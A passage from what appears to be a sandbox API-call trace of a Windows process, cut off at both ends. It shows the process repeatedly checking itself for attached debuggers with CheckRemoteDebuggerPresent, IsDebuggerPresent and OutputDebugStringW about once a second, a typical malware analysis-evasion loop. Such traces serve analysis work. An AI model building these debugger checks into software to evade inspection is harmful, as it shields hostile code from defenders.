returned 0xf64 [0108.265] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x3c8 [0108.265] GetExitCodeProcess (in: hProcess=0x3c8, lpExitCode=0x29011d8 | out: lpExitCode=0x29011d8*=0x103) returned 1 [0108.265] CheckRemoteDebuggerPresent (in: hProcess=0x3c8, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0108.265] IsDebuggerPresent () returned 0 [0108.265] GetCurrentProcessId () returned 0xf64 [0108.266] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x3cc [0108.266] GetExitCodeProcess (in: hProcess=0x3cc, lpExitCode=0x2901290 | out: lpExitCode=0x2901290*=0x103) returned 1 [0108.266] CloseHandle (hObject=0x3cc) returned 1 [0108.266] OutputDebugStringW (lpOutputString="") [0109.280] GetCurrentProcessId () returned 0xf64 [0109.281] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x3d0 [0109.281] GetExitCodeProcess (in: hProcess=0x3d0, lpExitCode=0x29014b8 | out: lpExitCode=0x29014b8*=0x103) returned 1 [0109.281] CheckRemoteDebuggerPresent (in: hProcess=0x3d0, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0109.281] IsDebuggerPresent () returned 0 [0109.281] GetCurrentProcessId () returned 0xf64 [0109.281] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x3d4 [0109.282] GetExitCodeProcess (in: hProcess=0x3d4, lpExitCode=0x2901570 | out: lpExitCode=0x2901570*=0x103) returned 1 [0109.282] CloseHandle (hObject=0x3d4) returned 1 [0109.282] OutputDebugStringW (lpOutputString="") [0110.293] GetCurrentProcessId () returned 0xf64 [0110.293] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x3d8 [0110.293] GetExitCodeProcess (in: hProcess=0x3d8, lpExitCode=0x2901798 | out: lpExitCode=0x2901798*=0x103) returned 1 [0110.293] CheckRemoteDebuggerPresent (in: hProcess=0x3d8, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0110.294] IsDebuggerPresent () returned 0 [0110.294] GetCurrentProcessId () returned 0xf64 [0110.294] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x3dc [0110.294] GetExitCodeProcess (in: hProcess=0x3dc, lpExitCode=0x2901850 | out: lpExitCode=0x2901850*=0x103) returned 1 [0110.294] CloseHandle (hObject=0x3dc) returned 1 [0110.294] OutputDebugStringW (lpOutputString="") [0111.728] GetCurrentProcessId () returned 0xf64 [0111.728] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x3e0 [0111.728] GetExitCodeProcess (in: hProcess=0x3e0, lpExitCode=0x2901a78 | out: lpExitCode=0x2901a78*=0x103) returned 1 [0111.729] CheckRemoteDebuggerPresent (in: hProcess=0x3e0, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0111.729] IsDebuggerPresent () returned 0 [0111.729] GetCurrentProcessId () returned 0xf64 [0111.729] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x3e4 [0111.729] GetExitCodeProcess (in: hProcess=0x3e4, lpExitCode=0x2901b30 | out: lpExitCode=0x2901b30*=0x103) returned 1 [0111.729] CloseHandle (hObject=0x3e4) returned 1 [0111.730] OutputDebugStringW (lpOutputString="") [0112.742] GetCurrentProcessId () returned 0xf64 [0112.742] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x3e8 [0112.742] GetExitCodeProcess (in: hProcess=0x3e8, lpExitCode=0x2901d58 | out: lpExitCode=0x2901d58*=0x103) returned 1 [0112.742] CheckRemoteDebuggerPresent (in: hProcess=0x3e8, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0112.743] IsDebuggerPresent () returned 0 [0112.743] GetCurrentProcessId () returned 0xf64 [0112.743] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x3ec [0112.743] GetExitCodeProcess (in: hProcess=0x3ec, lpExitCode=0x2901e10 | out: lpExitCode=0x2901e10*=0x103) returned 1 [0112.743] CloseHandle (hObject=0x3ec) returned 1 [0112.743] OutputDebugStringW (lpOutputString="") [0113.777] GetCurrentProcessId () returned 0xf64 [0113.778] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x3f0 [0113.778] GetExitCodeProcess (in: hProcess=0x3f0, lpExitCode=0x2902044 | out: lpExitCode=0x2902044*=0x103) returned 1 [0113.778] CheckRemoteDebuggerPresent (in: hProcess=0x3f0, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0113.778] IsDebuggerPresent () returned 0 [0113.778] GetCurrentProcessId () returned 0xf64 [0113.778] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x3f4 [0113.778] GetExitCodeProcess (in: hProcess=0x3f4, lpExitCode=0x29020fc | out: lpExitCode=0x29020fc*=0x103) returned 1 [0113.779] CloseHandle (hObject=0x3f4) returned 1 [0113.779] OutputDebugStringW (lpOutputString="") [0114.785] GetCurrentProcessId () returned 0xf64 [0114.786] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x3f8 [0114.786] GetExitCodeProcess (in: hProcess=0x3f8, lpExitCode=0x2902324 | out: lpExitCode=0x2902324*=0x103) returned 1 [0114.786] CheckRemoteDebuggerPresent (in: hProcess=0x3f8, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0114.786] IsDebuggerPresent () returned 0 [0114.786] GetCurrentProcessId () returned 0xf64 [0114.786] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x3fc [0114.787] GetExitCodeProcess (in: hProcess=0x3fc, lpExitCode=0x29023dc | out: lpExitCode=0x29023dc*=0x103) returned 1 [0114.787] CloseHandle (hObject=0x3fc) returned 1 [0114.787] OutputDebugStringW (lpOutputString="") [0115.846] GetCurrentProcessId () returned 0xf64 [0115.847] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x404 [0115.847] GetExitCodeProcess (in: hProcess=0x404, lpExitCode=0x2902604 | out: lpExitCode=0x2902604*=0x103) returned 1 [0115.847] CheckRemoteDebuggerPresent (in: hProcess=0x404, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0115.847] IsDebuggerPresent () returned 0 [0115.847] GetCurrentProcessId () returned 0xf64 [0115.847] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x408 [0115.847] GetExitCodeProcess (in: hProcess=0x408, lpExitCode=0x29026bc | out: lpExitCode=0x29026bc*=0x103) returned 1 [0115.848] CloseHandle (hObject=0x408) returned 1 [0115.848] OutputDebugStringW (lpOutputString="") [0117.258] GetCurrentProcessId () returned 0xf64 [0117.258] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x40c [0117.259] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x29028e4 | out: lpExitCode=0x29028e4*=0x103) returned 1 [0117.259] CheckRemoteDebuggerPresent (in: hProcess=0x40c, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0117.259] IsDebuggerPresent () returned 0 [0117.259] GetCurrentProcessId () returned 0xf64 [0117.259] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x410 [0117.260] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x290299c | out: lpExitCode=0x290299c*=0x103) returned 1 [0117.260] CloseHandle (hObject=0x410) returned 1 [0117.260] OutputDebugStringW (lpOutputString="") [0118.265] GetCurrentProcessId () returned 0xf64 [0118.265] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x414 [0118.265] GetExitCodeProcess (in: hProcess=0x414, lpExitCode=0x2902bc4 | out: lpExitCode=0x2902bc4*=0x103) returned 1 [0118.266] CheckRemoteDebuggerPresent (in: hProcess=0x414, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0118.266] IsDebuggerPresent () returned 0 [0118.266] GetCurrentProcessId () returned 0xf64 [0118.266] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x418 [0118.266] GetExitCodeProcess (in: hProcess=0x418, lpExitCode=0x2902c7c | out: lpExitCode=0x2902c7c*=0x103) returned 1 [0118.267] CloseHandle (hObject=0x418) returned 1 [0118.267] OutputDebugStringW (lpOutputString="") [0119.279] GetCurrentProcessId () returned 0xf64 [0119.279] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x41c [0119.279] GetExitCodeProcess (in: hProcess=0x41c, lpExitCode=0x2902ea4 | out: lpExitCode=0x2902ea4*=0x103) returned 1 [0119.280] CheckRemoteDebuggerPresent (in: hProcess=0x41c, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0119.280] IsDebuggerPresent () returned 0 [0119.280] GetCurrentProcessId () returned 0xf64 [0119.280] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x420 [0119.280] GetExitCodeProcess (in: hProcess=0x420, lpExitCode=0x2902f5c | out: lpExitCode=0x2902f5c*=0x103) returned 1 [0119.280] CloseHandle (hObject=0x420) returned 1 [0119.280] OutputDebugStringW (lpOutputString="") [0120.292] GetCurrentProcessId () returned 0xf64 [0120.292] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x424 [0120.292] GetExitCodeProcess (in: hProcess=0x424, lpExitCode=0x2903184 | out: lpExitCode=0x2903184*=0x103) returned 1 [0120.293] CheckRemoteDebuggerPresent (in: hProcess=0x424, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0120.293] IsDebuggerPresent () returned 0 [0120.293] GetCurrentProcessId () returned 0xf64 [0120.293] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x428 [0120.293] GetExitCodeProcess (in: hProcess=0x428, lpExitCode=0x290323c | out: lpExitCode=0x290323c*=0x103) returned 1 [0120.293] CloseHandle (hObject=0x428) returned 1 [0120.293] OutputDebugStringW (lpOutputString="") [0121.307] GetCurrentProcessId () returned 0xf64 [0121.307] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x42c [0121.307] GetExitCodeProcess (in: hProcess=0x42c, lpExitCode=0x2903464 | out: lpExitCode=0x2903464*=0x103) returned 1 [0121.307] CheckRemoteDebuggerPresent (in: hProcess=0x42c, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0121.307] IsDebuggerPresent () returned 0 [0121.307] GetCurrentProcessId () returned 0xf64 [0121.308] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x430 [0121.309] GetExitCodeProcess (in: hProcess=0x430, lpExitCode=0x290351c | out: lpExitCode=0x290351c*=0x103) returned 1 [0121.309] CloseHandle (hObject=0x430) returned 1 [0121.309] OutputDebugStringW (lpOutputString="") [0122.320] GetCurrentProcessId () returned 0xf64 [0122.320] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x434 [0122.320] GetExitCodeProcess (in: hProcess=0x434, lpExitCode=0x2903744 | out: lpExitCode=0x2903744*=0x103) returned 1 [0122.320] CheckRemoteDebuggerPresent (in: hProcess=0x434, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0122.321] IsDebuggerPresent () returned 0 [0122.321] GetCurrentProcessId () returned 0xf64 [0122.321] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x438 [0122.321] GetExitCodeProcess (in: hProcess=0x438, lpExitCode=0x29037fc | out: lpExitCode=0x29037fc*=0x103) returned 1 [0122.321] CloseHandle (hObject=0x438) returned 1 [0122.321] OutputDebugStringW (lpOutputString="") [0123.334] GetCurrentProcessId () returned 0xf64 [0123.334] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x43c [0123.335] GetExitCodeProcess (in: hProcess=0x43c, lpExitCode=0x2903a24 | out: lpExitCode=0x2903a24*=0x103) returned 1 [0123.335] CheckRemoteDebuggerPresent (in: hProcess=0x43c, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0123.335] IsDebuggerPresent () returned 0 [0123.335] GetCurrentProcessId () returned 0xf64 [0123.335] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x440 [0123.335] GetExitCodeProcess (in: hProcess=0x440, lpExitCode=0x2903adc | out: lpExitCode=0x2903adc*=0x103) returned 1 [0123.335] CloseHandle (hObject=0x440) returned 1 [0123.335] OutputDebugStringW (lpOutputString="") [0124.349] GetCurrentProcessId () returned 0xf64 [0124.349] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x444 [0124.350] GetExitCodeProcess (in: hProcess=0x444, lpExitCode=0x2903d04 | out: lpExitCode=0x2903d04*=0x103) returned 1 [0124.350] CheckRemoteDebuggerPresent (in: hProcess=0x444, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0124.350] IsDebuggerPresent () returned 0 [0124.350] GetCurrentProcessId () returned 0xf64 [0124.350] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x448 [0124.350] GetExitCodeProcess (in: hProcess=0x448, lpExitCode=0x2903dbc | out: lpExitCode=0x2903dbc*=0x103) returned 1 [0124.351] CloseHandle (hObject=0x448) returned 1 [0124.351] OutputDebugStringW (lpOutputString="") [0125.364] GetCurrentProcessId () returned 0xf64 [0125.365] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x44c [0125.365] GetExitCodeProcess (in: hProcess=0x44c, lpExitCode=0x2903ff0 | out: lpExitCode=0x2903ff0*=0x103) returned 1 [0125.365] CheckRemoteDebuggerPresent (in: hProcess=0x44c, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0125.365] IsDebuggerPresent () returned 0 [0125.365] GetCurrentProcessId () returned 0xf64 [0125.366] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x450 [0125.366] GetExitCodeProcess (in: hProcess=0x450, lpExitCode=0x29040a8 | out: lpExitCode=0x29040a8*=0x103) returned 1 [0125.366] CloseHandle (hObject=0x450) returned 1 [0125.366] OutputDebugStringW (lpOutputString="") [0126.516] GetCurrentProcessId () returned 0xf64 [0126.517] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x454 [0126.517] GetExitCodeProcess (in: hProcess=0x454, lpExitCode=0x29042d0 | out: lpExitCode=0x29042d0*=0x103) returned 1 [0126.517] CheckRemoteDebuggerPresent (in: hProcess=0x454, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0126.517] IsDebuggerPresent () returned 0 [0126.517] GetCurrentProcessId () returned 0xf64 [0126.517] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x458 [0126.517] GetExitCodeProcess (in: hProcess=0x458, lpExitCode=0x2904388 | out: lpExitCode=0x2904388*=0x103) returned 1 [0126.518] CloseHandle (hObject=0x458) returned 1 [0126.518] OutputDebugStringW (lpOutputString="") [0127.566] GetCurrentProcessId () returned 0xf64 [0127.566] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x45c [0127.566] GetExitCodeProcess (in: hProcess=0x45c, lpExitCode=0x29045b0 | out: lpExitCode=0x29045b0*=0x103) returned 1 [0127.567] CheckRemoteDebuggerPresent (in: hProcess=0x45c, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0127.567] IsDebuggerPresent () returned 0 [0127.567] GetCurrentProcessId () returned 0xf64 [0127.567] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x460 [0127.567] GetExitCodeProcess (in: hProcess=0x460, lpExitCode=0x2904668 | out: lpExitCode=0x2904668*=0x103) returned 1 [0127.568] CloseHandle (hObject=0x460) returned 1 [0127.568] OutputDebugStringW (lpOutputString="") [0128.576] GetCurrentProcessId () returned 0xf64 [0128.576] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x464 [0128.577] GetExitCodeProcess (in: hProcess=0x464, lpExitCode=0x2904890 | out: lpExitCode=0x2904890*=0x103) returned 1 [0128.577] CheckRemoteDebuggerPresent (in: hProcess=0x464, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0128.577] IsDebuggerPresent () returned 0 [0128.577] GetCurrentProcessId () returned 0xf64 [0128.577] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x468 [0128.577] GetExitCodeProcess (in: hProcess=0x468, lpExitCode=0x2904948 | out: lpExitCode=0x2904948*=0x103) returned 1 [0128.577] CloseHandle (hObject=0x468) returned 1 [0128.578] OutputDebugStringW (lpOutputString="") [0129.605] GetCurrentProcessId () returned 0xf64 [0129.605] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x46c [0129.606] GetExitCodeProcess (in: hProcess=0x46c, lpExitCode=0x2904b70 | out: lpExitCode=0x2904b70*=0x103) returned 1 [0129.606] CheckRemoteDebuggerPresent (in: hProcess=0x46c, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0129.606] IsDebuggerPresent () returned 0 [0129.606] GetCurrentProcessId () returned 0xf64 [0129.606] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x470 [0129.606] GetExitCodeProcess (in: hProcess=0x470, lpExitCode=0x2904c28 | out: lpExitCode=0x2904c28*=0x103) returned 1 [0129.606] CloseHandle (hObject=0x470) returned 1 [0129.606] OutputDebugStringW (lpOutputString="") [0130.619] GetCurrentProcessId () returned 0xf64 [0130.620] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x474 [0130.620] GetExitCodeProcess (in: hProcess=0x474, lpExitCode=0x2904e50 | out: lpExitCode=0x2904e50*=0x103) returned 1 [0130.620] CheckRemoteDebuggerPresent (in: hProcess=0x474, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0130.620] IsDebuggerPresent () returned 0 [0130.620] GetCurrentProcessId () returned 0xf64 [0130.620] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x478 [0130.620] GetExitCodeProcess (in: hProcess=0x478, lpExitCode=0x2904f08 | out: lpExitCode=0x2904f08*=0x103) returned 1 [0130.620] CloseHandle (hObject=0x478) returned 1 [0130.620] OutputDebugStringW (lpOutputString="") [0131.697] GetCurrentProcessId () returned 0xf64 [0131.698] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x174 [0131.698] GetExitCodeProcess (in: hProcess=0x174, lpExitCode=0x2905130 | out: lpExitCode=0x2905130*=0x103) returned 1 [0131.698] CheckRemoteDebuggerPresent (in: hProcess=0x174, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0131.698] IsDebuggerPresent () returned 0 [0131.698] GetCurrentProcessId () returned 0xf64 [0131.699] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x484 [0131.699] GetExitCodeProcess (in: hProcess=0x484, lpExitCode=0x29051e8 | out: lpExitCode=0x29051e8*=0x103) returned 1 [0131.699] CloseHandle (hObject=0x484) returned 1 [0131.699] OutputDebugStringW (lpOutputString="") [0132.711] GetCurrentProcessId () returned 0xf64 [0132.711] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x488 [0132.711] GetExitCodeProcess (in: hProcess=0x488, lpExitCode=0x2905410 | out: lpExitCode=0x2905410*=0x103) returned 1 [0132.711] CheckRemoteDebuggerPresent (in: hProcess=0x488, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0132.711] IsDebuggerPresent () returned 0 [0132.712] GetCurrentProcessId () returned 0xf64 [0132.712] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x48c [0132.712] GetExitCodeProcess (in: hProcess=0x48c, lpExitCode=0x29054c8 | out: lpExitCode=0x29054c8*=0x103) returned 1 [0132.712] CloseHandle (hObject=0x48c) returned 1 [0132.713] OutputDebugStringW (lpOutputString="") [0133.756] GetCurrentProcessId () returned 0xf64 [0133.756] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x490 [0133.756] GetExitCodeProcess (in: hProcess=0x490, lpExitCode=0x29056f0 | out: lpExitCode=0x29056f0*=0x103) returned 1 [0133.756] CheckRemoteDebuggerPresent (in: hProcess=0x490, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0133.756] IsDebuggerPresent () returned 0 [0133.757] GetCurrentProcessId () returned 0xf64 [0133.757] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x494 [0133.757] GetExitCodeProcess (in: hProcess=0x494, lpExitCode=0x29057a8 | out: lpExitCode=0x29057a8*=0x103) returned 1 [0133.757] CloseHandle (hObject=0x494) returned 1 [0133.757] OutputDebugStringW (lpOutputString="") [0134.870] GetCurrentProcessId () returned 0xf64 [0134.870] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x498 [0134.870] GetExitCodeProcess (in: hProcess=0x498, lpExitCode=0x29059d0 | out: lpExitCode=0x29059d0*=0x103) returned 1 [0134.870] CheckRemoteDebuggerPresent (in: hProcess=0x498, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0134.870] IsDebuggerPresent () returned 0 [0134.870] GetCurrentProcessId () returned 0xf64 [0134.870] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x49c [0134.871] GetExitCodeProcess (in: hProcess=0x49c, lpExitCode=0x2905a88 | out: lpExitCode=0x2905a88*=0x103) returned 1 [0134.871] CloseHandle (hObject=0x49c) returned 1 [0134.871] OutputDebugStringW (lpOutputString="") [0135.878] GetCurrentProcessId () returned 0xf64 [0135.878] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x4a0 [0135.878] GetExitCodeProcess (in: hProcess=0x4a0, lpExitCode=0x2905cb0 | out: lpExitCode=0x2905cb0*=0x103) returned 1 [0135.879] CheckRemoteDebuggerPresent (in: hProcess=0x4a0, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0135.879] IsDebuggerPresent () returned 0 [0135.879] GetCurrentProcessId () returned 0xf64 [0135.879] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x4a4 [0135.880] GetExitCodeProcess (in: hProcess=0x4a4, lpExitCode=0x2905d68 | out: lpExitCode=0x2905d68*=0x103) returned 1 [0135.880] CloseHandle (hObject=0x4a4) returned 1 [0135.880] OutputDebugStringW (lpOutputString="") [0136.893] GetCurrentProcessId () returned 0xf64 [0136.893] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x4a8 [0136.893] GetExitCodeProcess (in: hProcess=0x4a8, lpExitCode=0x2905f90 | out: lpExitCode=0x2905f90*=0x103) returned 1 [0136.893] CheckRemoteDebuggerPresent (in: hProcess=0x4a8, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0136.893] IsDebuggerPresent () returned 0 [0136.894] GetCurrentProcessId () returned 0xf64 [0136.894] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x4ac [0136.894] GetExitCodeProcess (in: hProcess=0x4ac, lpExitCode=0x2906054 | out: lpExitCode=0x2906054*=0x103) returned 1 [0136.894] CloseHandle (hObject=0x4ac) returned 1 [0136.894] OutputDebugStringW (lpOutputString="") [0137.904] GetCurrentProcessId () returned 0xf64 [0137.905] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x4b0 [0137.905] GetExitCodeProcess (in: hProcess=0x4b0, lpExitCode=0x290627c | out: lpExitCode=0x290627c*=0x103) returned 1 [0137.905] CheckRemoteDebuggerPresent (in: hProcess=0x4b0, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0137.905] IsDebuggerPresent () returned 0 [0137.905] GetCurrentProcessId () returned 0xf64 [0137.905] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x4b4 [0137.905] GetExitCodeProcess (in: hProcess=0x4b4, lpExitCode=0x2906334 | out: lpExitCode=0x2906334*=0x103) returned 1 [0137.906] CloseHandle (hObject=0x4b4) returned 1 [0137.906] OutputDebugStringW (lpOutputString="") [0138.919] GetCurrentProcessId () returned 0xf64 [0138.919] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x4b8 [0138.919] GetExitCodeProcess (in: hProcess=0x4b8, lpExitCode=0x290655c | out: lpExitCode=0x290655c*=0x103) returned 1 [0138.920] CheckRemoteDebuggerPresent (in: hProcess=0x4b8, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0138.920] IsDebuggerPresent () returned 0 [0138.920] GetCurrentProcessId () returned 0xf64 [0138.920] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x4bc [0138.920] GetExitCodeProcess (in: hProcess=0x4bc, lpExitCode=0x2906614 | out: lpExitCode=0x2906614*=0x103) returned 1 [0138.920] CloseHandle (hObject=0x4bc) returned 1 [0138.920] OutputDebugStringW (lpOutputString="") [0139.933] GetCurrentProcessId () returned 0xf64 [0139.934] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x4c0 [0139.934] GetExitCodeProcess (in: hProcess=0x4c0, lpExitCode=0x290683c | out: lpExitCode=0x290683c*=0x103) returned 1 [0139.934] CheckRemoteDebuggerPresent (in: hProcess=0x4c0, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0139.934] IsDebuggerPresent () returned 0 [0139.935] GetCurrentProcessId () returned 0xf64 [0139.935] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x4c4 [0139.935] GetExitCodeProcess (in: hProcess=0x4c4, lpExitCode=0x29068f4 | out: lpExitCode=0x29068f4*=0x103) returned 1 [0139.936] CloseHandle (hObject=0x4c4) returned 1 [0139.936] OutputDebugStringW (lpOutputString="") [0140.948] GetCurrentProcessId () returned 0xf64 [0140.949] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x4c8 [0140.949] GetExitCodeProcess (in: hProcess=0x4c8, lpExitCode=0x2906b1c | out: lpExitCode=0x2906b1c*=0x103) returned 1 [0140.949] CheckRemoteDebuggerPresent (in: hProcess=0x4c8, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0140.949] IsDebuggerPresent () returned 0 [0140.950] GetCurrentProcessId () returned 0xf64 [0140.950] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x4cc [0140.950] GetExitCodeProcess (in: hProcess=0x4cc, lpExitCode=0x2906bd4 | out: lpExitCode=0x2906bd4*=0x103) returned 1 [0140.950] CloseHandle (hObject=0x4cc) returned 1 [0140.951] OutputDebugStringW (lpOutputString="") [0141.962] GetCurrentProcessId () returned 0xf64 [0141.962] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x4d0 [0141.962] GetExitCodeProcess (in: hProcess=0x4d0, lpExitCode=0x2906dfc | out: lpExitCode=0x2906dfc*=0x103) returned 1 [0141.962] CheckRemoteDebuggerPresent (in: hProcess=0x4d0, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0141.962] IsDebuggerPresent () returned 0 [0141.963] GetCurrentProcessId () returned 0xf64 [0141.963] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) 